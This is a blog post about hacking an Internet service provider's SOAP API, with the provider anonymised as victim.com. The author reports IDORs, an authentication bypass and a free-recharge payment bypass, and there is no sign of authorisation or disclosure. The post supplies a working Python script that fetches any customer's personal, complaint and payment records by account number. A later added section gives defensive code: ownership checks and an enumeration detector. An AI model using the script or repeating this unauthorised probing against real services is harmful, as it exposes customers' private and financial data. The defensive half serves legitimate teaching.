How I hacked my Internet Service Provider and automated the attack (Hacked to Learn)

Armaan Pathan
Feb 17, 2018 · 3 min read

I'll be using victim.com as the site name in this article, as I cannot disclose the real one. It was a normal day and I was looking for some good internet plans, as my current plan had ended. While I was checking the internet plans, my browser was hooked up to Burp Suite, and I noticed the HTTP traffic in Burp's history, found some mysterious endpoints, and also found the website's API documentation link. So I looked into the documentation and started fuzzing the API parameters.
After spending 10–15 minutes fuzzing parameters, I found an IDOR through which I was able to view any user's personal information. Then I went back to reading the API documentation and found multiple more IDORs in the application: I was able to see complaint details, register a complaint as any user, and reset any user's MAC address. Then I found the most critical issue: I was able to check any user's payment details, bypass the application's payment gateway, and do a recharge for free. But to perform this attack I still had to log in to my account, so the scenario was still limited and I wanted to make the attack more critical. So I started reading the authentication API documentation again and found that I was able to bypass authentication over the API and call it without any authentication at all.
But to perform this attack I still needed to manually intercept the traffic in Burp and change the different API endpoints to get such information. This was kind of boring, so I decided to automate the attack, for which I wrote the small Python script below.

import requests, sys
import xml.etree.ElementTree as ET

# The account number to look up is taken from the first command-line argument
uservalue = sys.argv[1]

def details(uservalue):
    xml = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<victimDetail xmlns="http://victim.com/">
<victimAccNo>{0}</victimAccNo>
</victimDetail>
</soap:Body>
</soap:Envelope>"""
    xml = xml.format(uservalue)
    headers = {'Content-Type': 'text/xml', 'SOAPAction': 'http://victim.com'}
    body = requests.post('http://victim.com', data=xml, headers=headers).text
    xml_parsed = ET.fromstring(body)
    # Walk down positionally to the record element inside the SOAP response
    root = xml_parsed[0][0][0][1][0][0]
    print("#################### User Details #######################")
    for element in root:
        print(element.tag, '\t\t:\t\t', element.text)
    print()
    # Individual fields can also be read positionally, e.g. acc_no = root[0].text

def complaint_ticket(uservalue):
    xml = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<victimTicketDetail xmlns="http://victim.com">
<victim>{0}</victim>
<FromDate>01/01/2016</FromDate>
<ToDate>31/12/2018</ToDate>
</victimTicketDetail>
</soap:Body>
</soap:Envelope>"""
    xml = xml.format(uservalue)
    headers = {'Content-Type': 'text/xml', 'SOAPAction': 'http://victim.com'}
    body = requests.post('http://victim.com', data=xml, headers=headers).text
    xml_parsed = ET.fromstring(body)
    root = xml_parsed[0][0][0][1][0][0]
    print("#################### Complaint Tickets of User #######################")
    for element in root:
        print(element.tag, '\t\t:\t\t', element.text)
    print()

def payment_details(uservalue):
    xml = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<victimPayment xmlns="http://victim.com">
<victimID>{0}</victimID>
</victimPayment>
</soap:Body>
</soap:Envelope>"""
    xml = xml.format(uservalue)
    headers = {'Content-Type': 'text/xml', 'SOAPAction': 'http://victim.com'}
    body = requests.post('http://victim.com', data=xml, headers=headers).text
    xml_parsed = ET.fromstring(body)
    root = xml_parsed[0][0][0][1][0][0]
    print("#################### Payment Details of User #######################")
    for element in root:
        print(element.tag, '\t\t:\t\t', element.text)
    print()

details(uservalue)
complaint_ticket(uservalue)
payment_details(uservalue)

Now the automation is done: I just need to run the Python script with an account number as the argument and it fetches all the sensitive information of any user.
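The root cause in every endpoint above is the same: the server trusted whatever account number arrived in the SOAP body and never asked whether the caller was authenticated or owned that object. As an added example (not code from the article or from the ISP), here is what the server side of the victimDetail operation looks like once both checks are in place, together with a detector that would have caught the script above from the audit trail. The session store, the account records, the audit-log shape and the threshold are all constructed for the example; the SOAP envelope shape and the http://victim.com/ namespace are taken from the article's request bodies.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
API_NS = "http://victim.com/"  # default namespace used in the article's request bodies

# Constructed session store: session token -> (user id, account numbers that user owns).
SESSIONS = {
    "tok-alice": ("alice", {"1001"}),
    "tok-bob": ("bob", {"2002", "2003"}),
}

# Constructed account records returned by a successful lookup.
ACCOUNTS = {
    "1001": {"Name": "Alice", "Plan": "50Mbps"},
    "2002": {"Name": "Bob", "Plan": "100Mbps"},
    "2003": {"Name": "Bob (office)", "Plan": "200Mbps"},
}

# Audit trail of (principal, requested account, outcome); the detector below reads it.
AUDIT_LOG = []


def parse_account_no(soap_body):
    """Pull victimAccNo out of a victimDetail request; reject anything else."""
    root = ET.fromstring(soap_body)  # use defusedxml for untrusted XML in production
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        raise ValueError("missing soap:Body")
    op = body.find(f"{{{API_NS}}}victimDetail")
    if op is None:
        raise ValueError("unsupported operation")
    acc_no = (op.findtext(f"{{{API_NS}}}victimAccNo") or "").strip()
    if not acc_no.isdigit():
        raise ValueError("invalid victimAccNo")
    return acc_no


def handle_victim_detail(session_token, soap_body):
    """Authenticate the session, then authorise the object. Returns (status, record)."""
    session = SESSIONS.get(session_token)
    if session is None:
        # No valid session: the article's auth bypass worked because this check was absent.
        AUDIT_LOG.append(("<anonymous>", None, "unauthenticated"))
        return 401, None
    user_id, owned_accounts = session
    try:
        acc_no = parse_account_no(soap_body)
    except (ValueError, ET.ParseError):
        return 400, None
    if acc_no not in owned_accounts:
        # Object-level authorisation: the check whose absence is the IDOR described above.
        AUDIT_LOG.append((user_id, acc_no, "denied"))
        return 403, None  # return 404 instead if account existence must not be leaked
    AUDIT_LOG.append((user_id, acc_no, "ok"))
    return 200, ACCOUNTS.get(acc_no)


def flag_enumeration(audit_log, threshold=5):
    """Return principals that requested more than `threshold` distinct account numbers.

    A real customer touches one or two accounts; a script walking account numbers
    touches many, so the distinct-object count per principal is a simple, robust signal.
    """
    seen = defaultdict(set)
    for principal, acc_no, _outcome in audit_log:
        if acc_no is not None:
            seen[principal].add(acc_no)
    return sorted(p for p, accs in seen.items() if len(accs) > threshold)


def build_request(acc_no):
    """Build a victimDetail body shaped like the article's (XML prologue omitted)."""
    return (
        f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body>'
        f'<victimDetail xmlns="{API_NS}"><victimAccNo>{acc_no}</victimAccNo></victimDetail>'
        f"</soap:Body></soap:Envelope>"
    )


def demo():
    """Replay the article's scenario against the hardened handler; returns (statuses, flagged)."""
    AUDIT_LOG.clear()
    statuses = []
    # Alice reads her own account: allowed.
    statuses.append(handle_victim_detail("tok-alice", build_request("1001"))[0])
    # Alice's script then walks other customers' account numbers: every one is denied and logged.
    for n in range(2000, 2010):
        statuses.append(handle_victim_detail("tok-alice", build_request(str(n)))[0])
    # A request with no session at all is rejected before the body is even parsed.
    statuses.append(handle_victim_detail("", build_request("1001"))[0])
    # A well-formed envelope carrying the wrong operation is a client error, not a lookup.
    empty = f'<soap:Envelope xmlns:soap="{SOAP_NS}"><soap:Body/></soap:Envelope>'
    statuses.append(handle_victim_detail("tok-bob", empty)[0])
    return statuses, flag_enumeration(AUDIT_LOG)


if __name__ == "__main__":
    statuses, flagged = demo()
    print("statuses:", statuses)
    print("principals flagged for enumeration:", flagged)
```

The ownership test in handle_victim_detail is the single line that closes the IDOR: the account number in the body is treated as a claim, and the session, not the request, decides which accounts may be read. The same pattern applies to the complaint and payment operations, which take the same kind of identifier. The detector is deliberately outcome-agnostic: it counts distinct objects per principal whether the requests were denied or succeeded, so it also surfaces enumeration against an endpoint where the authorisation check is still missing.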

Thanks for reading guys. Have a great day ahead. cheers !
:)
